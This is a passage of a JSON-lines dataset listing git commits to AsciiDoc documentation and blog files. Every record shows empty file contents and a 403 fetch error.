2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97974b4ef98ebfe2010fb8ee03c4a9c6fd587780","subject":"Create Linux.adoc","message":"Create Linux.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/installation\/Linux.adoc","new_file":"wiki\/installation\/Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03a9b9297f9d46df4b3934fd374da048a1666cfd","subject":"Update documentation for CGREEN_NO_FORK","message":"Update documentation for CGREEN_NO_FORK\n","repos":"thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"99f1fb0dcd712784934155de90e67bf01796354a","subject":"Update 
2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"127d83d8565456df835a35eeff30d9b856c5e9c6","subject":"Update 2017-02-27-Test-Maven-350-alpha-1.adoc","message":"Update 2017-02-27-Test-Maven-350-alpha-1.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2017-02-27-Test-Maven-350-alpha-1.adoc","new_file":"_posts\/2017-02-27-Test-Maven-350-alpha-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e41d4cce5ca96cb08612475f76539f6c8bc58f1","subject":"[docs] Bump the data size and tablets limits","message":"[docs] Bump the data size and tablets limits\n\nSome of the changes that landed in 1.4.0, namely Todd's memory consumption\nand log segments improvements, plus the beginning of Adar's thread consolidation\neffort, make it so that it's easier for Kudu to store more data per node.\n\nSome notes (mostly coming from Adar):\n - Memory consumption now seems to be around 1.5GB \/ TB of data on disk after\n startup for a TPC-H lineitem table.\n - File descriptor consumption is about 2 per log segment plus 1 per log index.\n Tablets with some replication lag will use more segments. 
To that is added\n the fd cache that defaults to 40% of the configured max fds.\n - Thread usage is about 5 for hot replicas, then 2 when they become cold (new\n 1.4.0 concept that Todd added).\n\nBased on the above, doubling our current limitations of 4TB spread over 1000\ntablets to 8TB spread over 2000 means that:\n - 8TB requires at least 12GB of memory, then some more for the MRS, block cache,\n and scanners (around 256KB per column per scan).\n - 6000 fds are required to spin up 2000 tablets, plus what the fd cache uses.\n - 10k threads are required to just to start Kudu.\n\nChange-Id: Ie60d2c3548c402c6a08db9bb724bc6367db989ca\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7503\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dd0be5fc6224c0dbc40818e92a1d9f2772dfb85","subject":"loc analyser results in CLI mode","message":"loc analyser results in CLI mode\n","repos":"llaville\/php-reflect,remicollet\/php-reflect","old_file":"docs\/loc_analysis.out.asciidoc","new_file":"docs\/loc_analysis.out.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"dff9bfd7db88c7706160e2740f7c04c7de8abd61","subject":"Update 2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","message":"Update 2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","new_file":"_posts\/2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"567ab313a6a5b66200eb0569d0b19ae1067a4d35","subject":"Renamed '_posts\/2011-01-01-markdown-test-2.adoc' to '_posts\/2011-01-markdown-test-2.adoc'","message":"Renamed '_posts\/2011-01-01-markdown-test-2.adoc' to 
'_posts\/2011-01-markdown-test-2.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2011-01-markdown-test-2.adoc","new_file":"_posts\/2011-01-markdown-test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d5e0c69d7b891b80e9151297ffff9e9cc93afe3","subject":"Update 2019-01-31-how-to-learn.adoc","message":"Update 2019-01-31-how-to-learn.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-how-to-learn.adoc","new_file":"_posts\/2019-01-31-how-to-learn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b63744cc41ca25fcca9d3b4f134241878299b03","subject":"Installation guide for Arch Linux.","message":"Installation guide for Arch Linux.\n","repos":"andreatta\/andreatta.github.io","old_file":"install_arch.adoc","new_file":"install_arch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreatta\/andreatta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9e55179f154c2bed0aee076e13c64d103414fae","subject":"[DOCS] Adding index file for GS \"mini book\".","message":"[DOCS] Adding index file for GS \"mini book\".\n","repos":"shreejay\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,scottsom\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,s
trapdata\/elassandra,mjason3\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,coding0011\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elasticassandra,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,vroyer\/elasticassandra,gfyoung\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch","old_file":"docs\/reference\/gs-index.asciidoc","new_file":"docs\/reference\/gs-index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a73702e46aa427c3a426d51df2cb932e7403acc","subject":"doc\/Z-PLUGINS.adoc","message":"doc\/Z-PLUGINS.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/Z-PLUGINS.adoc","new_file":"doc\/Z-PLUGINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5680334d680dd4434f56fdcdb3db8c5329dc6e98","subject":"y2b create post Apple Airport Time Capsule Unboxing \\u0026 Overview (3TB Time Capsule 2013)","message":"y2b create post Apple Airport Time Capsule Unboxing \\u0026 Overview (3TB Time Capsule 
2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-02-Apple-Airport-Time-Capsule-Unboxing-u0026-Overview-3TB-Time-Capsule-2013.adoc","new_file":"_posts\/2013-07-02-Apple-Airport-Time-Capsule-Unboxing-u0026-Overview-3TB-Time-Capsule-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea6808e6cc89597e1b4935fd5685994f78880ef0","subject":"Wording IDE","message":"Wording IDE\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76279457159488cfc746bcb3b4ac0bc5a441d25b","subject":"FH-4208 Walkthrough of Mobile CI\/CD with MCP","message":"FH-4208 Walkthrough of Mobile CI\/CD with MCP\n","repos":"feedhenry\/mcp-standalone,feedhenry\/mcp-standalone,feedhenry\/mcp-standalone,feedhenry\/mcp-standalone","old_file":"docs\/walkthroughs\/mobile-ci-cd.adoc","new_file":"docs\/walkthroughs\/mobile-ci-cd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feedhenry\/mcp-standalone.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b227889e7a84581f2f146935668f3403b0c1619","subject":"Add gh pages index","message":"Add gh pages index\n\nSigned-off-by: Hiroshi Miura <ff6fb3ed059786151e736af13627c08d24e9f922@linux.com>\n","repos":"eb4j\/xml2eb","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eb4j\/xml2eb.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"0efe8c79363dbaf5b27183de9cf7aea9b877136d","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f894b39145d8d4d9446e5112d494f92767e60d","subject":"Update 2015-02-11-test-blog.adoc","message":"Update 2015-02-11-test-blog.adoc","repos":"ben-liu\/hubpress.io,ben-liu\/hubpress.io","old_file":"_posts\/2015-02-11-test-blog.adoc","new_file":"_posts\/2015-02-11-test-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ben-liu\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f82c9eedd53b2533de01f7bf49224f4461f722f","subject":"Update 2016-02-04-Inception.adoc","message":"Update 
2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1992c0d5dafed7753063db51f56ed90cd3321baa","subject":"Update 2016-10-03-Prototype.adoc","message":"Update 2016-10-03-Prototype.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Prototype.adoc","new_file":"_posts\/2016-10-03-Prototype.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f1cf376a042bcc8441c41a659e3406593f7278e","subject":"Update 2017-02-02-Not-Clear.adoc","message":"Update 2017-02-02-Not-Clear.adoc","repos":"tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io","old_file":"_posts\/2017-02-02-Not-Clear.adoc","new_file":"_posts\/2017-02-02-Not-Clear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tofusoul\/tofusoul.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3836b442a42f3a3eeef866db5c4b964fe88b4c5d","subject":"y2b create post Thank you.","message":"y2b create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-18-Thank-you.adoc","new_file":"_posts\/2018-02-18-Thank-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c218dbaba4f3699a550853b5963babb2274f2230","subject":"code of conduct","message":"code of conduct\n","repos":"spring-cloud-stream-app-starters\/core","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"038a7345a60b6f791936100d9e93b6397d1a5d3f","subject":"Formatting fix","message":"Formatting fix\n","repos":"Remo\/MyDevelopmentEnvironment,Remo\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/04-utilities.adoc","new_file":"src\/sections\/04-utilities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d4d21511e17d99aac4ba2316faa416bb37b29f1","subject":"Renamed '_posts\/static-page-test.adoc' to '_posts\/About-Me.adoc'","message":"Renamed '_posts\/static-page-test.adoc' to 
'_posts\/About-Me.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/About-Me.adoc","new_file":"_posts\/About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a714010f2bd2c1658d787b46eafbaeee30376c5","subject":"Update 2016-08-30-About-me.adoc","message":"Update 2016-08-30-About-me.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-08-30-About-me.adoc","new_file":"_posts\/2016-08-30-About-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f8fc1da354cbce52757024845f67acd8b4117e8","subject":"Update 2016-10-03-Universe.adoc","message":"Update 2016-10-03-Universe.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Universe.adoc","new_file":"_posts\/2016-10-03-Universe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a10e1bd62d551e00c03a16bd72e2eabe1a7f15be","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0520cf3a1b9d0dd689d96cf81effef4db8a648ab","subject":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","message":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3866b94e0f72d2668814a1065c4f8b74aaca4660","subject":"Update 2017-03-18-Spring-Boot-Test.adoc","message":"Update 2017-03-18-Spring-Boot-Test.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-03-18-Spring-Boot-Test.adoc","new_file":"_posts\/2017-03-18-Spring-Boot-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd1b5eec7ec4bf445c5e3663ce21956c936fe931","subject":"Delete the file at '_posts\/2019-01-31-It-is-but-a-Test.adoc'","message":"Delete the file at 
'_posts\/2019-01-31-It-is-but-a-Test.adoc'","repos":"deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io","old_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deivisk\/deivisk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e8962483a420eef3c8edada6f8cab19a1485616","subject":"To Eclipse Java 2019-06","message":"To Eclipse Java 2019-06\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07423f4af36c8d3682bb86b97538ae518eb97e30","subject":"Update 2019-09-29-DB-tips.adoc","message":"Update 2019-09-29-DB-tips.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2019-09-29-DB-tips.adoc","new_file":"_posts\/2019-09-29-DB-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd8151e13228eb0d5e520e7ff7d2346b94c2e307","subject":"Added Backlog Tracer docs","message":"Added Backlog Tracer docs\n","repos":"pmoerenhout\/camel,onders86\/camel,ullgren\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,CodeSmell\/camel,kevinearls\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,onders86\/camel,gnodet\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,mcollovati\/camel,pax95\/camel,apache\/camel,christophd\/camel,alvinkwekel\/camel,Fabryprog\/camel,gnodet\/camel,objectiser\/camel,adessaigne\/camel,nicolaferraro\/camel,CodeSmell\/camel,cunningt\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,nikhilvibhav\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,CodeSmell\/camel,pax95\/camel,ullgren\/camel,christophd\/camel,tadayosi\/camel,objectiser\/camel,pax95\/camel,christophd\/camel,Fabryprog\/camel,mcollovati\/camel,DariusX\/camel,onders86\/camel,alvinkwekel\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel,tdiesler\/camel,adessaigne\/camel,DariusX\/camel,pax95\/camel,gnodet\/camel,cunningt\/camel,gnodet\/camel,alvinkwekel\/camel,zregvart\/camel,punkhorn\/camel-upstream,apache\/camel,adessaigne\/camel,punkhorn\/camel-upstream,tadayosi\/camel,nikhilvibhav\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,ullgren\/camel,onders86\/camel,mcollovati\/camel,zregvart\/camel,pax95\/camel,davidkarlsen\/camel,DariusX\/camel,christophd\/camel,tdiesler\/camel,pmoerenhout\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,zregvart\/camel,zregvart\/camel,nikhilvibhav\/camel,Fabryprog\/camel,kevinearls\/camel,punkhorn\/camel-upstream,adessaigne\/camel,christophd\/camel,mcollovati\/camel,pax95\/camel,nicolaferraro\/camel,apache\/camel,apache\/camel,davidkarlsen\/camel,onders86\/camel,objectiser\/camel,CodeSmell\/camel,Fabryprog\/camel,kevinearls\/camel,nicolaferraro\/camel,cunningt\/camel,kevinearls\/camel,da
